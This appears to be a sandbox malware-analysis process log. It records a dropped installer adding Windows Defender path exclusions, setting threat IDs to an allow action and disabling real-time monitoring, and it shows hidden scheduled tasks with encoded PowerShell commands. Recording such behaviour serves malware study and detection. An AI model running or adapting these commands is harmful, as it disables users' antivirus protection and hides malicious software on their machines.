C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\XKbpoCnULTQzsVVB /t REG_DWORD /d 0 /reg:643⤵PID:5256
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵PID:5344
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵PID:5496
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵PID:5116
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵PID:4392
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\XzCRxLAMjkWVuGGMb /t REG_DWORD /d 0 /reg:323⤵PID:4380
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\XzCRxLAMjkWVuGGMb /t REG_DWORD /d 0 /reg:643⤵PID:1832
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\WIjQsZOhtuiKSoXd /t REG_DWORD /d 0 /reg:323⤵PID:2344
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\WIjQsZOhtuiKSoXd /t REG_DWORD /d 0 /reg:643⤵PID:1688
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gdRwrDaxR" /SC once /ST 06:42:28 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Scheduled Task/Job: Scheduled Task
PID:3568
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gdRwrDaxR"2⤵PID:5560
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gdRwrDaxR"2⤵PID:2184
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "NEaCSBqXysBCPlvqA" /SC once /ST 01:50:53 /RU "SYSTEM" /TR "\"C:\Windows\Temp\WIjQsZOhtuiKSoXd\QBJFAnahrWxXzYu\lEOjaxW.exe\" d4 /KrJWdidFb 525403 /S" /V1 /F2⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
PID:5804
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "NEaCSBqXysBCPlvqA"2⤵PID:4740
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6052 -s 7082⤵
- Program crash
PID:2180
-
-
C:\Users\Admin\AppData\Local\Temp\7zS1DB4.tmp\Install.exeC:\Users\Admin\AppData\Local\Temp\7zS1DB4.tmp\Install.exe XC /poAdidpNm 385132 /S1⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:1576 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2476
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\GtOnFDWCCgUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\GtOnFDWCCgUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\KDENuaOqQISU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\KDENuaOqQISU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\LAYqAmppRtojC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\LAYqAmppRtojC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\WIQLPldOU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\WIQLPldOU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\fjxFshYjVWUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\fjxFshYjVWUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\itCXZnYssICbfHKCXDR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\itCXZnYssICbfHKCXDR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ixMyiQryENPMC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ixMyiQryENPMC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qMeQRvtmXyxU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qMeQRvtmXyxU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\rZPMEzngU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\rZPMEzngU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\wmJzyKeAXJXSYcIjGXR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\wmJzyKeAXJXSYcIjGXR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\JHBMAPUCCwSCzfVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\JHBMAPUCCwSCzfVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\XKbpoCnULTQzsVVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\XKbpoCnULTQzsVVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\XzCRxLAMjkWVuGGMb\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\XzCRxLAMjkWVuGGMb\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\iAgbdZKqqGsOfMIBo\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\iAgbdZKqqGsOfMIBo\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\WIjQsZOhtuiKSoXd\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\WIjQsZOhtuiKSoXd\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\hwSlakOgexbeQMmf\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\hwSlakOgexbeQMmf\" /t REG_DWORD /d 0 /reg:64;"2⤵PID:1696
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gkfbJwcnr" /SC once /ST 04:15:54 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Scheduled Task/Job: Scheduled Task
PID:5404
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gkfbJwcnr"2⤵PID:1736
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gsEjIwrOM" /SC once /ST 02:09:12 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Scheduled Task/Job: Scheduled Task
PID:116
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gsEjIwrOM"2⤵PID:1992
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:2184
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gsEjIwrOM"2⤵PID:1236
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:322⤵PID:4336
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:323⤵
- Modifies Windows Defender Real-time Protection settings
PID:5436
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:642⤵PID:5428
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:643⤵
- Modifies Windows Defender Real-time Protection settings
PID:5484
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:6008 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵PID:1936
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵PID:5564
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵PID:1416
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵PID:2184
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵PID:5356
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵PID:1616
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵PID:5924
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵PID:1816
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵PID:4820
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵PID:5176
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵PID:4132
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵PID:6016
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵PID:5872
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵PID:4380
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵PID:2188
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵PID:2524
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵PID:1716
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵PID:4112
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵PID:5684
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵PID:388
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵PID:4432
-
-
